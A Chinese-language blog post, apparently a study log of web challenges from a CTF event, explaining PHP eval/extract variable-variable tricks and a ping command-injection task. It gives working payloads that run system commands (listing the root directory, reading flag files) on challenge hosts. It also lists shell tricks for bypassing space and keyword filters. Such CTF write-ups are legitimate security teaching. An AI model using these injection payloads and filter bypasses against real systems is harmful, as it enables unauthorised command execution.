在菜狗杯学到的

刷菜狗杯,总结了一些学到的知识点

我的眼里只有钱

源代码如下:

1
2
3
4
5
6
7
<?php
error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);


首先是eval函数,就是把里面的字符串当作命令执行,然后extract函数是将post里面的所有参数重叠在一起,然后最不懂的就是$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_,实际类似于c语言中的指针,每个$符号就是将后面的字符串当成了一个新变量,因此可以使用post传参解决

1
2
_=__&__=___&___=____&____=_____&_____=______&______=_______&_______=________&________=_________&_________=__________&__________=___________&___________=____________&____________=_____________&_____________=______________&______________=_______________&_______________=________________&________________=_________________&_________________=__________________&__________________=___________________&___________________=____________________&____________________=_____________________&_____________________=______________________&______________________=_______________________&_______________________=________________________&________________________=_________________________&_________________________=__________________________&__________________________=___________________________&___________________________=____________________________&____________________________=_____________________________&_____________________________=______________________________&______________________________=_______________________________&_______________________________=________________________________&________________________________=_________________________________&_________________________________=__________________________________&__________________________________=___________________________________&___________________________________=____________________________________&____________________________________=system('ls /')

签到题

1
2
3
4
5
6
7
8
9
10
11
12
<?php




error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);
http://d0255dc2-b1c4-4916-95b0-a3cfe0495d40.challenge.ctf.show/?b=c&c[0]=1&c[6][0][7][5][8][0][9][4][4]=system("cat /f1agaaa");
post: a=b
cookie:CTFshow-QQ群:=a

Ping Ping Ping

首先先看看ping是什么:ping是一种计算机网络工具,用来测试数据包能否透过IP协议到达特定主机。ping的运作原理是向目标主机传出一个ICMP的请求回显数据包,并等待接收回显回应数据包。程序会按时间和成功响应的次数估算丢失数据包率(丢包率)和数据包往返时间(网络时延,Round-trip delay time)。(出自维基百科)

页面中提示ip=?,提示我们传入一个ping来获取值,因此可以在里面进行注入。输入?ip=1.1.1.1;ls,发现目录下的flag.php文件,再次进行注入?ip=1.1.1.1;cat flag.php,发现空格和flag都被过滤掉了,因此采用以下的注入方式

1
2
3
4
5
6
//空格绕过
cat${IFS}flag.txt
cat$IFS$9flag.txt (正整数可以是任意)
cat<flag.txt
cat<>flag.txt
{cat,flag.txt}
1
2
3
//字段绕过
可以使用定义变量绕过
x = a g f a x=ag fax=agfax=flag

综上URL?ip=0;x=ag;cat$IFS$1fl$x.php

强网杯2019随便注入

算了我直接上url吧https://blog.csdn.net/Leaf_initial/article/details/130096560?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169958638916800225527898%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=169958638916800225527898&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-2-130096560-null-null.142^v96^pc_search_result_base3&utm_term=%E5%BC%BA%E7%BD%91%E6%9D%AF2019&spm=1018.2226.3001.4187


在菜狗杯学到的
http://example.com/2023/11/07/在菜狗杯学到的/
Author
John Doe
Posted on
November 7, 2023
Licensed under